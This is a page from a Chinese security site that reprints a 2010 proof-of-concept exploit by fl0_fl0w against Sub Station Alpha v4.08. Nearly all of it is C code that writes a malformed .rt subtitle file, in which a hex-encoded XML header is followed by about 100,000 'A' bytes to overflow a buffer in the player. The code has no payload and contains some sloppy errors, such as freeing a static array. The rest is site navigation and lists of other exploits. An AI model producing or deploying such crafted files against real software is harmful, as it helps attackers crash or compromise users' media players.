首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Sub Station Alpha v4.08 .rt file Local Buffer Overflow PoC
来源:flo_flow_supremacy[at]yahoo.com 作者:fl0_fl0w 发布时间:2010-01-18  

/*Sub Station Alpha v4.08 .rt file local buffer overflow poc
     by fl0 fl0w*/
#include <string.h>
#include <stdio.h>

#define FIL3 "testfile.rt"
   char header[]=
   {
             "\x3C\x77\x69\x6E\x64\x6F\x77\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x32\x35\x30\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x33\x30"
             "\x30\x22\x20\x64\x75\x72\x61\x74\x69\x6F\x6E\x3D\x22\x31\x35\x22\x20\x62\x67\x63\x6F\x6C\x6F\x72\x3D\x22\x79\x65\x6C\x6C"
             "\x6F\x77\x22\x3E\x0D\x0A\x4D\x61\x72\x79\x20\x68\x61\x64\x20\x61\x20\x6C\x69\x74\x74\x6C\x65\x20\x6C\x61\x6D\x62\x2C\x0D"
             "\x0A\x3C\x62\x72\x2F\x3E\x3C\x74\x69\x6D\x65\x20\x62\x65\x67\x69\x6E\x3D\x22"     //header 109 bytes
   };       
   char tail[]=
   {  
            //junk
            "\x22\x2F\x3E\x0D\x0A\x3C\x62\x72\x2F\x3E\x3C\x74\x69\x6D\x65\x20\x62\x65\x67\x69\x6E\x3D\x22\x36\x22\x2F\x3E\x6C\x69\x74"
            "\x74\x6C\x65\x20\x6C\x61\x6D\x62\x2C\x0D\x0A\x3C\x62\x72\x2F\x3E\x3C\x74\x69\x6D\x65\x20\x62\x65\x67\x69\x6E\x3D\x22\x39"
            "\x22\x2F\x3E\x4D\x61\x72\x79\x20\x68\x61\x64\x20\x61\x20\x6C\x69\x74\x74\x6C\x65\x20\x6C\x61\x6D\x62\x0D\x0A\x3C\x62\x72"
            "\x2F\x3E\x3C\x74\x69\x6D\x65\x20\x62\x65\x67\x69\x6E\x3D\x22\x31\x32\x22\x2F\x3E\x77\x68\x6F\x73\x65\x20\x66\x6C\x65\x65"
            "\x63\x65\x20\x77\x61\x73\x20\x77\x68\x69\x74\x65\x20\x61\x73\x20\x73\x6E\x6F\x77\x2E\x0D\x0A\x3C\x2F\x77\x69\x6E\x64\x6F"
            "\x77\x3E\x0D\x0A"    //tail 154 bytes
   };     
   char banner[]=
   {
            "***********************************************************\n"
            "Sub Station Alpha v4.08 .rt file local buffer overflow poc*\n"
            "     by fl0 fl0w                                          *\n"
            "***********************************************************\n"
   };     
/*--------prototypes------*/ 
   int cpy(char*,char*,int);
   int cpystr(char*,int,int,int);
   void print(char*);
   unsigned int getFsize(FILE*,char*);
/*-----extern var--------*/
   char b[1000000]; 
   char *size; 
   char junk[1000000];
/*--------main---------------*/
    int main()
    {  
        printf("%s",banner);
        print("Starting sploit");
        memset(junk,0x41,99999);
         buildf(FIL3);
          print("File done!");
          getchar();
          return 0;
    }            
  int buildf(char* fname)
  {
      FILE* fp=fopen(fname,"wb");
       
      if(fp==NULL)
      {
         print("File writing error");
         exit(0);
      }  
      fprintf(fp,"%s%s%s",header,junk,tail);
      printf("[!]File is %d bytes",getFsize(fp,FIL3));
      fclose(fp);
      free(b);
             
      return 0; 
  }  
   unsigned int getFsize(FILE* g,char* gname)
   {
            unsigned int s;
           
             g=fopen(gname,"rb");
             
             if(g==NULL)
             {
             print("File error at reading");
             exit(0);
             }           
             fseek(g,0,SEEK_END);
             s=ftell(g);
            
            return s;
   }  
   int cpy(char* source,char* dest,int offset)
   {
     int len;
     len=strlen(source);
     memcpy(dest+offset,source,len+1);
    
     return len;
   }
   int cpystr(char* dest,int str,int len,int offset)
  {
      memset(dest+offset,str,len+1);
      return len;
  }    
   void print(char* msg)
   {
     printf("\n[*]%s\n",msg);
   }
            


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·BS.Player v2.51 SEH Overwrite
·Aqua Real v1 and 2 Local Crash
·OtsTurntables Free v1.00.047 S
·Google SketchUp <= v7.1.6087 '
·MediaMonkey Player suffers fro
·IE wshom.ocx ActiveX Control R
·Authentium SafeCentral <= 2.6
·BS.Player v2.51 Universal SEH
·Authentium SafeCentral <= 2.6
·IE wshom.ocx ActiveX remote co
·Apple iTunes 8.1.x (daap) Buff
·Rosoft Media Player 4.4.4 Buff
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved